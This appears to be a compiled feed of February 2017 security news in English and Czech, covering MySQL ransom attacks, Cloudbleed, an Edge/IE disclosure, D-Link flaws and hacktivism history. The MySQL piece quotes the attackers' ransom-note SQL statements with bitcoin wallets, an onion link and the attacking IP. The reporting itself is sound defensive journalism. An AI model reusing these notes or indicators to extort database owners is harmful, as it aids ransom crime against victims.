A wave of ransom attacks is targeting MySQL Databases worldwide
25.2.2017 securityaffairs Virus
A wave of ransom attacks is threatening thousands of MySQL databases that are exposed online, the hackers are brute forcing poorly secured MySQL servers.
Databases exposed online with a poor security continues to be a privileged target of hackers.
Early this year, experts warned of a spike in the number of attacks against MongoDB systems, crooks requested the payment of a ransom in order to return data and help the company to fix the flaw they exploited. The attacks were discovered by the Co-founder of the GDI Foundation, Victor Gevers, who warned of poor security for MongoDB installations in the wild.
Similar attacks are now threatening thousands of MySQL databases that are exposed online, the hackers are brute forcing poorly secured MySQL servers.
The attackers enumerate existing databases and their tables, steal their content, and creating a new table that contains the instruction to pay a 0.2 Bitcoin (around $200) ransom.
The attacks targeted SQL databases all around the world.
What happens when victims pay the ransom?
In some cases, crooks provided owners with access to their data, but there is no certainty, some archives were permanently deleted without dump them first.
Unfortunately, it is quite easy to find MySQL databases online and attempt to guess their passwords with brute force attacks.
The experts at the security firm GuardiCore observed, hundreds of attacks during a 30-hour window starting at midnight on February 12.
The attacks were launched by the same IP address (109.236.88.20), likely a compromised mail server, and were all hosted by worldstream.nl. The researchers notified the attacks to the Netherlands-based web hosting company.
“The attacks started at midnight at 00:15 on February 12 and lasted about 30 hours in which hundreds of attacks were reported by GGSN. We were able to trace all the attacks to 109.236.88.20, an IP address hosted by worldstream.nl, a Netherlands-based web hosting company. ” reads the analysis shared by Guardicore. “The attack starts with ‘root’ password brute-forcing. Once logged-in, it fetches a list of the existing MySQL databases and their tables and creates a new table called ‘WARNING’ that includes a contact email address, a bitcoin address and a payment demand.”
The experts observed two versions of the ransom message:
INSERT INTO PLEASE_READ.`WARNING`(id, warning, Bitcoin_Address, Email) VALUES(‘1′,’Send 0.2 BTC to this address and contact this email with your ip or db_name of your server to recover your database! Your DB is Backed up to our servers!’, ‘1ET9NHZEXXQ34qSP46vKg8mrWgT89cfZoY’, ‘backupservice@mail2tor.com’)
and
INSERT INTO `WARNING`(id, warning)
VALUES(1, ‘SEND 0.2 BTC TO THIS ADDRESS 1Kg9nGFdAoZWmrn1qPMZstam3CXLgcxPA9 AND GO TO THIS SITE http://sognd75g4isasu2v.onion/ TO RECOVER YOUR DATABASE! SQL DUMP WILL BE AVAILABLE AFTER PAYMENT! To access this site you have use the tor browser https://www.torproject.org/projects/torbrowser.html.en’)
The researchers have analyzed the transactions associated to the bitcoin wallets associated with the attacks:
1Kg9nGFdAoZWmrn1qPMZstam3CXLgcxPA9
1ET9NHZEXXQ34qSP46vKg8mrWgT89cfZoY
and
The experts highlight the importance of security MySQL server exposed online by using strong passwords and forcing mandatory authentication.
Periodically backup of the data and monitor continuously the access to the MySQL databases in order to could prevent serious damage to the administrators.
“Every MySQL server facing the internet is prone to this attack, so ensure your servers are hardened. Also, make sure your servers require authentication and that strong passwords are in use. Minimizing internet facing services, particularly those containing sensitive information is also a good practice. Monitoring your internet accessible machines/services is crucial to being able to rapidly respond to any breach.” GuardiCore also notes.
Google Does It Again: Discloses Unpatched Microsoft Edge and IE Vulnerability
25.2.2017 thehackernews Vulnerebility
Google Does It Again: Discloses Microsoft Edge and IE Vulnerability In Public
This month has yet been kind of interesting for cyber security researchers, with Google successfully cracked SHA1 and the discovery of Cloudbleed bug in Cloudflare that caused the leakage of sensitive information across sites hosted behind Cloudflare.
Besides this, Google last week disclosed an unpatched vulnerability in Windows Graphics Device Interface (GDI) library, which affects Microsoft's Windows operating systems ranging from Windows Vista Service Pack 2 to the latest Windows 10.
While the Windows vulnerability has yet to be patched by the company, Google today released the details of another unpatched Windows security flaw in its browser, as Microsoft did not act within its 90-day disclosure deadline.
The vulnerability (CVE-2017-0037), discovered and disclosed by Google Project Zero team's researcher Ivan Fratric, is a so-called "type confusion flaw" in a module in Microsoft Edge and Internet Explorer that potentially leads to arbitrary code execution.
Proof-of-Concept Code Released!
This time, with the details of this arbitrary code execution bug, the researcher has also published a proof-of-concept exploit that can crash Edge and IE, opening the door for potential hackers to execute code and gain administrator privileges on the affected systems.
Fratric says he successfully ran his PoC code on the 64-bit version of IE on Windows Server 2012 R2, but both 32-bit IE 11, as well as Microsoft Edge, is affected by the same vulnerability.
In short, the vulnerability affects all Windows 7, Windows 8.1, and Windows 10 users.
You can know more details about the recently disclosed flaw on Google's bug report blog, along with proof-of-concept code that causes a crash of the browsers, though sophisticated hackers can build more dangerous exploits as well.
This vulnerability was reported to Microsoft on November 25, and it went public on February 25, after Google Project Zero's 90-day disclosure policy.
Three Unpatched, but Already Disclosed Windows Flaws
While Microsoft has delayed this month's Patch Tuesday and already has to patch two already disclosed, but unpatched vulnerabilities, it is hard to say if the company actually included a patch for this vulnerability discovered by Google in its next roll out of patches.
Yes, Microsoft has to patch two other severe security flaws as well, which have already been publicly disclosed with working exploit code but remain still unpatched, giving hackers enough time to target Windows users.
First one is a Windows SMB flaw that affects Windows 8, Windows 10 and Windows Server. The PoC exploit code of this flaw was released almost two weeks ago.
The other one is the vulnerability disclosed by Google last week that affects Microsoft's Windows operating systems ranging from Windows Vista Service Pack 2 to the latest Windows 10.
Meanwhile, just to remain on the safer side, Windows users are advised to replace their Internet Explorer and Edge browsers with a different one if possible and avoid clicking on suspicious links and websites they do not trust.
Carder forum claims 150 million logins for sale from CloudBleed case
25.2.2017 securityaffairs Crime
The carder forum CVV2Finder claims to have more than 150 million logins, from several popular services, including Netflix and Uber. The operators in the forum are offering the precious commodity to the VIP members.
According to the experts, the data were obtained by exploiting the recently discovered Cloudbleed, a flaw that was causing the leak of a wide range of sensitive information in the CloudFlare infrastructure, including authentication cookies and login credentials of numerous organizations using the popular service.
The Cloudbleed security issue with Cloudflare servers has a significant impact on numerous major organizations, including Uber, Fitbit, 1Password, and OKCupid. Cloudbleed also affects mobile apps, because, they are developed using the same backends as browsers for content delivery and HTTPS (SSL/TLS) termination.
The flaw was discovered by the popular researcher Tavis Ormandy from Google Project Zero Team.
The Canadian researcher Phineas (@itsphin) published on GitHub a list of more than 4 million domains possibly affected by Cloudflare’s Cloudbleed HTTPS Traffic Leak.
The list includes popular services such as 23andme, Coinbase, Patreon, Yelp, Fiverr, and Change.org.
“This list contains all domains that use Cloudflare DNS, not just the Cloudflare proxy (the affected service that leaked data). It’s a broad sweeping list that includes everything. Just because a domain is on the list does not mean the site is compromised, and sites may be compromised that do not appear on this list.” explained Phineas.
“Cloudflare has not provided an official list of affected domains, and likely will not due to privacy concerns. I’m compiling an unofficial list here so you know what passwords to change.”
Follow
Phineas ✪ @itsphin
If you’d like to quickly search through the Cloudflare directory;https://github.com/Phineas/cloudbleed-search …
12:04 AM - 25 Feb 2017
Photo published for Phineas/cloudbleed-search
Phineas/cloudbleed-search
cloudbleed-search - Search through Cloudflare domains in pirate/sites-using-cloudflare
github.com
Retweets 5 5 likes
Experts at Salted Hash received via email the following screenshot the CVV2Finder carder forum.
A messaged appeared on the CVV2Finder forum clearly refers the Cloudbleed case as the source of millions of fresh credentials for popular services.
“Dear DeepWeb Users of cvv2finder, After the success of the latest attack (cloudbleed) to cloudflare servers, More than 150 Million Fresh Logins Avaliable for Uber , Netflix … and many more. After hours these data will be avaliable into a database and would sell it for 250k$. This offer only for VIP users.”
This means that the impact of CloudBleed was much larger than first thought with a serious impact for CloudFlare customers.
Experts noticed that Netflix isn’t a CloudFlare customer, so the presence of the file in the list of accounts offered for sale is suspect.
“CVV2Finder lists Netflix, Dominos, several “People Meet” dating websites, Tidal, CBS, Bitdefender, Origin, Dell, UPS, HBO Now, Spotify, and DirecTV accounts in their database as available to purchase.” reported Salted HAsh. “However, there are only 2,300 accounts, a far cry from the 150 million they are promising.”
Apple internal development servers compromised by a malware
25.2.2017 securityaffairs Apple
Apple’s design lab internal development servers was infected by a malware so the company ended its relationship with Supermicro server supplier.
It was mid-2016 when Apple’s design lab internal development servers was infected by a malware that was masquerading as a fake firmware patch.
In response to the security incident, Apple purged its data centers of servers built by Supermicro, including returning recently purchased systems.
“In early 2016, Apple discovered what it believed was a potential security vulnerability in at least one data center server it purchased from a U.S.-based manufacturer, Super Micro Computer, according to a Super Micro executive and two people who were briefed about the incident at Apple.” reported the theinformation.com. “The server was part of Apple’s technical infrastructure, which powers its web-based services and holds customer data.”
A source familiar with the case at Apple told Ars that the malicious firmware was downloaded directly from Supermicro’s support site, and the malicious code is still hosted there.
Apple denied the security breach, but the senior vice-president of technology t Supermicro, Tau Leng, told The Information that the company had ended its relationship with Supermicro because of the infection in the App Store development environment. Leng also confirmed Apple returned the systems it had recently purchased.
The trend for cloud giants is the slight migration to custom hardware designed by system integrators to cut the cost of the data center.
apple server
According to Leng, Apple was the only company to be infected by a fake firmware, this means that the root cause of the security breach was not in the Supermicro’s servers. He asserted that when his company asked Apple’s engineers to provide information about the firmware, they gave an incorrect version number—and then refused to give further information.
Leng also added that information about the firmware version shared by Apple’s engineers was incorrect (wrong version number).
An Apple spokesperson reached out by Ars defined the story “completely inaccurate.”
Let’s wait for the Apple’s version.
MySQL Databases Targeted in New Ransom Attacks
25.2.2017 securityweek Virus
Thousands of MySQL databases are potential victims to a ransom attack that appears to be an evolution of the MongoDB ransack campaign observed a couple months ago, GuardiCore warns.
As part of the attack, unknown actors are brute forcing poorly secured MySQL servers, enumerate existing databases and their tables, stealing them, and creating a new table to instruct owners to pay a 0.2 Bitcoin (around $200) ransom. Paying, the attackers claim, would provide owners with access to their data, but that’s not entirely true, as some databases are deleted without being stolen.
A similar attack came to light in early January, when Victor Gevers, co-founder of GDI Foundation, revealed that thousands of unsecured MongoDB databases were being hijacked, with actors demanding 0.2 Bitcoin for the stolen data. Soon after, other threat actors began hijacking insecure databases, and over 30,000 MongoDB instances fell to the attackers.
With an estimated 35,000 instances exposed to the public Internet, Elasticsearch clusters became targets as well, only to be followed by Hadoop and CouchDB databases within days. Attackers were observed overwriting each other’s ransom notes on the targeted databases, and were no longer copying the original data, but simply deleting it. Victims couldn’t retrieve their data even if they paid the ransom.
Now, MySQL databases are under fire: using online tools, actors search for servers secured with very weak passwords, brute force them to gain access, then replace the databases with their own table containing a ransom note. In some instances, they simply delete the databases without dumping them first, leaving victims with no means to recover the data.
According to the security firm, hundreds of attacks were observed during a 30-hour window starting at midnight on February 12. All attacks were traced to the same IP (109.236.88.20) and were all hosted by worldstream.nl, a Netherlands-based web hosting company, which was notified on the issue a couple of days later. The researchers believe the attackers were using a compromised mail server that also serves as HTTP(s) and FTP server.
Responding to an email inquiry, Ofri Ziv, Research Leader at GuardiCore, told SecurityWeek that the attacks were spread all around the world and didn’t appear to be targeting specific databases. He couldn’t provide an exact estimation of affected databases, but said “we do know of thousands of MySQL servers facing the Internet with weak passwords that are prone to attacks.”
The attacks are strikingly similar with the MongoDB ones, starting with the fact that the attackers are dropping ransom notes named WARNING and PLEASE_READ. However, Ziv says there’s no way to tell for sure whether the same attackers switched to MySQL servers now. “But even if it’s not the case, they were definitely inspired by them,” he told SecurityWeek.
The Bitcoin addresses in the ransom notes show signs of activity, but GuardiCore says that isn’t proof that victims actually paid the ransom. The transactions might have been staged by the actors themselves, in an attempt to encourage victims to pay the ransom.
“Before paying the ransom we strongly encourage you to verify that the attacker actually holds your data and that it can be restored. In the attacks we monitored we couldn’t find evidence of any dump operation or data exfiltration,” GuardiCore notes in a blog post.
The security firm notes that every MySQL server facing the Internet is prone to this attack, and advises administrators to ensure their instances are properly secured using strong passwords and mandatory authentication. Further, admins should minimize the Internet facing services, especially those containing sensitive information.
“Monitoring your internet accessible machines/services is crucial to being able to rapidly respond to any breach. This way your security team could easily alert on new services being accessed from the internet and enforce a policy which fits those servers (e.g. firewall, data restrictions, etc.). Periodic data backup could allow you restore most of your valuable data without the need to interact with the attacker and provide you with a backup plan should a similar attack occurs,” GuardiCore also notes.
D-Link Patches Serious Flaws in DGS-1510 Switches
25.2.2017 securityweek Vulnerebility
D-Link has released firmware updates for the company’s DGS-1510 stackable managed switches to address serious vulnerabilities that can be exploited remotely to hijack the devices.
Security researchers Aditya K Sood and Varang Amin discovered that the D-Link DGS-1510 switches, which are recommended for small and medium-sized enterprises, have an insecure authentication design.
According to the experts, a remote attacker can exploit the authentication bypass vulnerabilities to execute commands on the switch, and extract configuration and other data.
A proof-of-concept (PoC) shared by the researchers with SecurityWeek shows how an unauthenticated attacker can harvest user information from a device, including username and password, and add a new user with administrator privileges. The PoC will be made publicly available at a later date.
Sood and Amin said they identified dozens of systems on the Internet, but they did not attempt to determine exactly how many devices can be exploited remotely from the Web.
In its own advisory, D-Link described the vulnerabilities as unauthenticated command bypass and unauthenticated information disclosure issues. The flaws affect DGS-1510-28XMP, DGS-1510-28X, DGS-1510-52X, DGS-1510-52, DGS-1510-28P, DGS-1510-28 and DGS-1510-20 models running any firmware version prior to 1.31.B003.
The firmware update that addresses the security holes is currently in beta and it will be made generally available once it passes long-term quality assurance testing, D-Link said.
The problems were reported to D-Link in January and the patch, tested by the researchers, was released on February 21.
Serious vulnerabilities were found in many D-Link products last year, including cameras, access points, modems, routers, storage solutions and connected home products.
In early January, the U.S. Federal Trade Commission (FTC) filed a lawsuit against the Taiwan-based networking equipment provider, accusing the company of making deceptive claims about the security of its products. D-Link is determined to fight the “unwarranted and baseless” charges.
Briton Arrested Over Deutsche Telekom Hacking
25.2.2017 securityweek Hacking
A British national has been arrested at a London airport on suspicion of staging a cyber attack on Deutsche Telekom last year that knocked around a million German households offline, officials in both countries said Thursday.
The 29-year-old, who was subject to a European arrest warrant, was detained on Wednesday by officers from Britain's National Crime Agency (NCA), German federal police and prosecutors said in a statement.
"The Briton stands accused of attempted computer sabotage in a particularly serious case," they said.
Around a million of Deutsche Telekom's 20 million customers were unable to connect to its network in late November, with the company saying a hacking attack targeting household routers was to blame for the hours-long disruptions.
An NCA spokesperson said the arrest took place at London's Luton airport at the request of German police but that the suspect was also wanted "in connection to separate offences committed in the UK".
German federal prosecutors said they were now seeking the suspect's extradition from Britain.
If found guilty, he faces up to 10 years' jail in Germany.
Cyber fears
In their statement, German police said the goal of the Deutsche Telekom assault was to infect users' computers with a "botnet" operated by the accused -- a network of web-connected machines that can be manipulated with malware.
The suspect allegedly offered the botnet for sale on the deep web, the statement added.
Deutsche Telekom was able to fend off the attack by advising customers to disconnect their routers and restart them after a software update.
The large-scale strike fuelled concerns over cyber security in Germany and officials have warned that more online assaults are possible ahead of a general election in September.
The country has already been the victim of repeated hacking attacks in recent years.
Last September, several political parties were targeted with fake emails purporting to be from NATO headquarters but which in fact contained a link that installed spying software on victims' computers.
In 2015, hackers targeted Germany's lower house parliament in an attack that security services have since blamed on Russia.
Germany has also anxiously eyed the impact of leaked documents obtained by hackers during last year's US presidential campaign.
Chancellor Angela Merkel said late last year that cyber attacks from Russia were now so common that Germany must learn to cope with them as "part of daily life".
Gmail accounts lockout the users. Glitch or hack, it’s a mystery
25.2.2017 securityaffairs IT
A huge number of Gmail accounts lockout their users and forced them to log in again. What has happened? Is it the result of a massive cyber attack?
A huge number of Gmail accounts lockout the users, the strange behavior leads the experts into believing that something has happened. Is it a computer glitch or a hack?
Rumors of a cyber attack are circulating online, on Reddit many users shared a description of their strange experience. Gmail users are receiving messages informing them that their account has been changed, and asking them to re-sign into Gmail accounts on their mobile.
Google replied to one of the thread on one of its official forums by confirming that an investigation is ongoing, but at the same time, the company is downplaying concerns.
In response to a thread on one of its official forums, Google said it was investigating the issue while downplaying concerns confirming that there is no indication the accounts have been hacked.
“We’ve gotten reports about some users being signed out of their accounts, unexpectedly. We’re investigating, but not to worry: there is no indication that this is connected to any phishing or account security threats. Please try to sign-in again at accounts.google.com and if you cannot remember your password, please use this link (g.co/recover) to recover your password.” reads the Google’s response.
Follow
Google ✔ @Google
We know some of you had issues signing in today. Please try again now. Rest easy -- your account's security was not affected.
6:09 AM - 24 Feb 2017
970 970 Retweets 2,009 2,009 likes
Hackread.com cited Crystal Cee from Google’s Product Forum, confirming that Google users need to sign in again to access their accounts using this address “accounts.google.com.”
Cee explained that if users have forgotten the password then they have to use this link “g.co/Recover” to recover it. Cee also added that users with 2-step verification can experience a delay in SMS code reception.
We can only wait for further information shared by the IT giant.
Kyberútoky ve službách politiky
25.2.2017 SecurityWorld BigBrother
Když exprezident Václav Klaus představil na počátku loňského září protiuprchlickou výzvu, její web se rychle stal terčem útoků. Během první hodiny zaznamenali provozovatelé nejméně dvacet pokusů o modifikaci stránek, což názorně svědčí o jednom: politika se vede i na internetu – a to všemi prostředky.
Využití kybernetického prostoru k prosazování názorů „násilnou cestou“ není přitom fenomén nový. Ovšem v české kotlině byl zatím spíše výjimečný, což ale představovalo jakousi lokální anomálii.
Jak ale ukazují události poslední doby, začínáme svět rychle dohánět. Leč nepředbíhejme.
Zřejmě první případ zneužití kybernetického prostoru k politickému nátlaku se stal v říjnu 1989 a měl podobu červa WANK (Worm Against Nuclear Killers). Ten byl součástí širší protijaderné kampaně (trochu absurdně brojil proti atomovým zbraním, ale „protestoval“ proti startu meziplanetární sondy Galileo s jadernou baterií na palubě).
Jinak šlo o druhý největší útok červa v historii internetu: pokud je měřítkem celkové procento napadených počítačů (největším útokem byl legendární Morrisův Worm z listopadu 1988).
V první polovině devadesátých let se objevily desítky počítačových virů, které v konkrétních dnech nebo při určitých příležitostech zobrazovaly požadavek na zastavení francouzských jaderných testů v Tichomoří. Mnohé z nich se dostaly i do Česka: kybernetická politika tak zřejmě poprvé dorazila do našich počítačů.
Hudba jako záminka
V říjnu 1994 aktivistická skupina Zippies vytvořila e-mailovou bombu a podnikla několik DDoS útoků proti britské vládě a zvláště pak premiérovi Johnu Mayorovi.
Ten totiž prosazoval zákon (zákon o kriminálních činech a veřejném pořádku), v němž byla i kontroverzní pasáž zakazující venkovní hlasitou hudbu s „řadou opakujících se taktů“.
Útok vstoupil do dějin jako „Intervasion of the UK“ a některé weby byly díky němu mimo provoz i více než týden. Šlo o zřejmě první použití DDoS útoku k politickému nátlaku. Zákon nakonec neprošel a kybernetická komunita si postupně začala uvědomovat svoji sílu a možnosti.
V červenci 2001 vyzvala mezinárodní skupina Hacktivismo k občanské neposlušnosti v kybernetickém prostoru. Vydala dokonce „Hacktivistickou deklaraci“, o které tvrdila, že je stejně významná jako Všeobecná deklarace lidských práv OSN.
Podle ní měl mít člověk na internetu zaručené „právo na názor a vyjádření“ a stejně tak mělo být zaručené právo vyvíjet a vlastnit technologie proti „státem sponzorované cenzuře internetu“.
Na první pohled lákavá myšlenka ale narazila na několik úskalí. Jednak svázat do podoby nějaké konvence volnomyšlenkářské aktivity na internetu není tak jednoduché. A jednak její kritici upozorňovali na protimluv, kdy deklarace měla garantovat svobodu vyjadřování jedné straně tím, že by ji upírala druhé.
Velké politikum přinesly duben 2007 a dnes již legendární přesun sochy rudoarmějce z centra estonského Tallinu. „Protest“ prokazatelně pocházející ze sousedního Ruska zasáhl prakticky kompletní infrastrukturu internetu v Estonsku.
Zkolabovaly počítače státní správy, nefungovala burza, v tradičně na kybernetických technologiích postavené zemi nebylo možné si prakticky nic vyřídit.
K útoku se přihlásila prokremelská skupina „Naši“, která zároveň popřela přímé rozkazy k jeho provedení z vyšších míst. I kdyby to byla pravda, je nabíledni, že Rusko proti útočníkům (prokazatelně porušujícím i jeho zákony) jakkoliv nezasáhlo.
A jaká je současnost?
Přenesme se nyní o několik let do současnosti. Analytici už několik let předpovídali dramatický nárůst politického kybernetického boje v naší zemi – a zřejmě se konečně dočkali.
Třeba na Slovensku už ve volebním roce 2012 padaly weby politických stran jako hrušky, o dezinformace a falešné profily nebyla nouze.
Největší českou aférou tak zůstávalo závratně rychlé získání 5 000 „lajků“ Strany práv občanů v září 2013 za jediný víkend. Většina nových obdivovatelů přitom byla z jihovýchodní Asie. (Pro úplnost: typická sazba je 200 Kč za získání 150 až 250 lajků.)
Po loňské protiuprchlické výzvě zmíněné v úvodu článku pak v prosinci 2015 někdo napadl twitterový účet premiéra Bohuslava Sobotky. A v lednu letošního roku web White Media zveřejnil v několika vlnách části jeho e-mailové korespondence.
Nic zásadně kompromitujícího v ní nebylo (kromě jednoho dokumentu ve stupni „Vyhrazené“, což je v ČR nejnižší stupeň utajení označující dokument, u něhož by neoprávněné nakládání mohlo být pro republiku nevýhodné), přesto samozřejmě využívání soukromé nee-mailové schránky k pracovním účelům (na takto kritické pozici) není v souladu se zásadami bezpečné komunikace.
V květnu pak útočníci napadli stránky senátu, policie a ČSSD – zaměřili se prý i na hasiče a ministerstvo vnitra. Reagovali tak na zákon o regulaci hazardu, který podle mnohých zavádí nebezpečný precedens v omezování svobody internetu.
A pokud se zase podíváme do světa, pak jedním z hlavních „kostlivců ve skříni“, kteří jsou neustále dokola vytahované na americkou prezidentskou kandidátku Hillary Clintonovou, je neoprávněné použití soukromého poštovního serveru k pracovní komunikaci.
Jistě, není to přímo kybernetický útok, ale spíše otázka osobní disciplíny. Problém každopádně není došetřen a bezpochyby o něm ještě uslyšíme. Každopádně je na něm ale vidět, že ICT bezpečnost začíná mít čím dál větší váhu i v politice.
CloudFlare Leaked Sensitive Customer Data
24.2.2017 securityweek Crime
CloudFlare has been working around the clock in the past few days to address a critical security problem that led to sensitive customer data getting leaked and cached by search engines.
The uninitialized memory leak was discovered by Google Project Zero researcher Tavis Ormandy, who jokingly said he considered the idea of calling it “Cloudbleed” due to similarities to the OpenSSL bug known as HeartBleed.
Ormandy noticed the leakage on February 17, while working on a fuzzing-related project. He immediately notified CloudFlare and the CDN had an initial mitigation in place within an hour. However, the cleanup effort took several days since Google, Yahoo, Bing and other search engines had cached at least 770 URIs across 161 unique domains containing leaked memory.
According to the expert, the leaked data included passwords, cookies, encryption keys, private messages from dating sites, chat messages, IP addresses and even HTTPS requests.
Researcher Nick Sweeting has compiled a list of potentially affected domains, including major services such as Coinbase, DigitalOcean, Medium, 4Chan, Yelp, Uber, Zendesk, OKCupid and Namecheap. Ormandy also named 1Password, but the password manager reassured users that their data was not at risk.
NowSecure has published a blog post detailing how the Cloudbleed bug impacts mobile applications.
In a blog post describing the incident, Cloudflare CTO John Graham-Cumming explained that the company’s edge servers were running past the end of a buffer and returning memory that contained sensitive information.
CloudFlare said memory leakage may have first occurred in September 2016, when the company enabled automatic HTTP rewrites. Then it got worse after a couple of features, server-side excludes and email obfuscation, were migrated to new parsers this year. The content delivery network has determined that the period with the greatest impact was February 13-18, when one in every 3.3 million HTTP requests going through CloudFlare may have resulted in memory leakage.
Graham-Cumming pointed out that customers’ SSL private keys were not leaked, but admitted that a private key used to encrypt connections between the company’s own machines was compromised.
CloudFlare said there was no evidence of any malicious exploits or information being leaked on Pastebin or other such websites. Google Project Zero said it destroyed the data samples collected during its analysis.
Ormandy was ultimately satisfied with how CloudFlare handled the issues and its detailed incident report. However, the expert believes the CDN’s blog “severely downplays the risk to customers.”
In an email to customers, Matthew Prince, Cloudflare Co-founder and CEO, said the company would notify customers if they discovered any data leaked about their domains during the search, and that they would provide full details on what was found.
"To date, we have yet to find any instance of the bug being exploited, but we recommend if you are concerned that you invalidate and reissue any persistent secrets, such as long lived session identifiers, tokens or keys," Prince wrote. "Due to the nature of the bug, customer SSL keys were not exposed and do not need to be rotated."
D-Link Patches Serious Flaws in DGS-1510 Switches
24.2.2017 securityweek Vulnerebility
D-Link has released firmware updates for the company’s DGS-1510 stackable managed switches to address serious vulnerabilities that can be exploited remotely to hijack the devices.
Security researchers Aditya K Sood and Varang Amin discovered that the D-Link DGS-1510 switches, which are recommended for small and medium-sized enterprises, have an insecure authentication design.
According to the experts, a remote attacker can exploit the authentication bypass vulnerabilities to execute commands on the switch, and extract configuration and other data.
A proof-of-concept (PoC) shared by the researchers with SecurityWeek shows how an unauthenticated attacker can harvest user information from a device, including username and password, and add a new user with administrator privileges. The PoC will be made publicly available at a later date.
Sood and Amin said they identified dozens of systems on the Internet, but they did not attempt to determine exactly how many devices can be exploited remotely from the Web.
In its own advisory, D-Link described the vulnerabilities as unauthenticated command bypass and unauthenticated information disclosure issues. The flaws affect DGS-1510-28XMP, DGS-1510-28X, DGS-1510-52X, DGS-1510-52, DGS-1510-28P, DGS-1510-28 and DGS-1510-20 models running any firmware version prior to 1.31.B003.
The firmware update that addresses the security holes is currently in beta and it will be made generally available once it passes long-term quality assurance testing, D-Link said.
The problems were reported to D-Link in January and the patch, tested by the researchers, was released on February 21.
Serious vulnerabilities were found in many D-Link products last year, including cameras, access points, modems, routers, storage solutions and connected home products.
In early January, the U.S. Federal Trade Commission (FTC) filed a lawsuit against the Taiwan-based networking equipment provider, accusing the company of making deceptive claims about the security of its products. D-Link is determined to fight the “unwarranted and baseless” charges.
Briton Arrested Over Deutsche Telekom Hacking
24.2.2017 securityweek Hacking
A British national has been arrested at a London airport on suspicion of staging a cyber attack on Deutsche Telekom last year that knocked around a million German households offline, officials in both countries said Thursday.
The 29-year-old, who was subject to a European arrest warrant, was detained on Wednesday by officers from Britain's National Crime Agency (NCA), German federal police and prosecutors said in a statement.
"The Briton stands accused of attempted computer sabotage in a particularly serious case," they said.
Around a million of Deutsche Telekom's 20 million customers were unable to connect to its network in late November, with the company saying a hacking attack targeting household routers was to blame for the hours-long disruptions.
An NCA spokesperson said the arrest took place at London's Luton airport at the request of German police but that the suspect was also wanted "in connection to separate offences committed in the UK".
German federal prosecutors said they were now seeking the suspect's extradition from Britain.
If found guilty, he faces up to 10 years' jail in Germany.
Cyber fears
In their statement, German police said the goal of the Deutsche Telekom assault was to infect users' computers with a "botnet" operated by the accused -- a network of web-connected machines that can be manipulated with malware.
The suspect allegedly offered the botnet for sale on the deep web, the statement added.
Deutsche Telekom was able to fend off the attack by advising customers to disconnect their routers and restart them after a software update.
The large-scale strike fuelled concerns over cyber security in Germany and officials have warned that more online assaults are possible ahead of a general election in September.
The country has already been the victim of repeated hacking attacks in recent years.
Last September, several political parties were targeted with fake emails purporting to be from NATO headquarters but which in fact contained a link that installed spying software on victims' computers.
In 2015, hackers targeted Germany's lower house parliament in an attack that security services have since blamed on Russia.
Germany has also anxiously eyed the impact of leaked documents obtained by hackers during last year's US presidential campaign.
Chancellor Angela Merkel said late last year that cyber attacks from Russia were now so common that Germany must learn to cope with them as "part of daily life".
U.S. Oil and Gas Industry Lagging in Security: Report
24.2.2017 securityweek Security
The oil and gas industry in the United States is largely unprepared to address cybersecurity risks in operational technology (OT) environments, according to a study commissioned by German engineering giant Siemens.
Of the 377 individuals who took part in a survey conducted by the Ponemon Institute, more than two-thirds admitted having to deal with at least one incident in the past year that resulted in OT disruption or loss of confidential information. Furthermore, there are concerns that some attacks may have gone undetected.
Interestingly, one in five of respondents admitted that their organizations had been targeted in attacks involving sophisticated pieces of malware such as Duqu and Flame.Oil and gas industry cybersecurity
Many believe their organization is at a low to medium level when it comes to OT cybersecurity readiness, and only 35 percent believe they are properly prepared, the report shows.
Well over half of respondents believe the risk is greater in OT than in IT environments, and 67 percent believe cyber threats have had a significant impact on the risk to industrial control systems (ICS). When comparing IT to OT, only one-third of respondents said cybersecurity operations covering these areas are fully aligned.
Sixty-nine percent of those who took part in the study are concerned about the risks associated with third-parties in the supply chain, and many said they had difficulties in mitigating risks across the oil and gas value chain.
A majority of the security experts working in the U.S. oil and gas industry are most concerned about negligent and malicious or criminal insiders. The type of information that is considered the most at risk includes exploratory information (72%), production information (60%), potential partners and acquisition targets (56%), financial reports (53%), and operational information (50%).
Only 41 percent said their organization continually monitors the OT infrastructure, but fewer are actually capable of assessing risks, identifying the source of an attack, or remediating an incident. More than half of respondents said they outsource or would consider outsourcing OT security operations.
When asked about the factors that pose a risk to their organization, roughly 60 percent of respondents named either outdated and aging control systems, or IT products that are known to be vulnerable used in production environments.
Experti bijí na poplach. Ransomware útočí stále častěji
24.2.2017 Novinky/Bezpečnost Viry
Dramatický nárůst útoků vyděračských virů, které jsou označovány souhrnným názvem ransomware, zaznamenali bezpečnostní experti. Podle aktuální zprávy antivirové společnosti Check Point se jejich podíl mezi jednotlivými hrozbami v druhé polovině loňského roku zvýšil na dvojnásobek. A bude hůř…
Co je ransomware? Každý třetí člověk to neví
Vyděračské viry, které jsou často označovány souhrnným názvem ransomware, patří několik posledních měsíců k těm nejzávažnějším hrozbám. Přesto každý třetí člověk neví, co slovo ransomware vlastně znamená. Tedy ani to, že jde o počítačového záškodníka. Vyplývá to z průzkumu antivirové společnosti Eset.
Průzkum se uskutečnil v USA a Kanadě, přičemž se ho dohromady účastnilo více než tři tisíce lidí. Třetina z nich odpověděla, že vůbec neví, co slovo ransomware znamená.
Bezpečnostní experti jim vysvětlili, že jde o škodlivé kódy, které dokážou uzamknout počítač a zašifrovat všechna uložená data. Také jim objasnili, že jde o škodlivé kódy, které uzamknou počítač, zašifrují data a za jejich zpřístupnění požadují výkupné. To by však 85 % lidí nebylo ochotných zaplatit. Raději by o takto uloupená data přišli.
Zajímavá je také informace o tom, jak si lidé svoje data chrání. Rovných 31 % dotázaných totiž uvedlo, že soubory uložené v počítači vůbec žádným způsobem nezálohuje. A to ani fotografie či videa. V případě útoku vyděračského viru by tak o svá data nenávratně přišli.
„V roce 2016 byly detekovány tisíce nových ransomwarových variant a v posledních měsících jsme byli svědky další změny. Ransomware je stále více a více centralizovaný a několik významných malwarových rodin dominuje celému trhu a útočí na organizace všech velikostí,“ podotkl Petr Kadrmas, bezpečnostní odborník ze společnosti Check Point.
Podle něj ale pochopitelně nejsou ničím výjimečným ani útoky na koncové uživatele. Na podniky a firemní sítě se nicméně počítačoví piráti zaměřují ještě častěji, protože tam mohou napáchat daleko větší neplechu.
Důvod, proč kyberzločinci ransomware tak často šíří, je prostý. „Ransomware prostě funguje a generuje útočníkům zisky. Organizace se snaží efektivně chránit, ale mnoho z nich nepoužívá správné zabezpečení a podceňuje vzdělávání zaměstnanců, kteří by rozpoznáním příznaků útoku mohli zabránit nákladným škodám,“ podotkl Kadrmas.
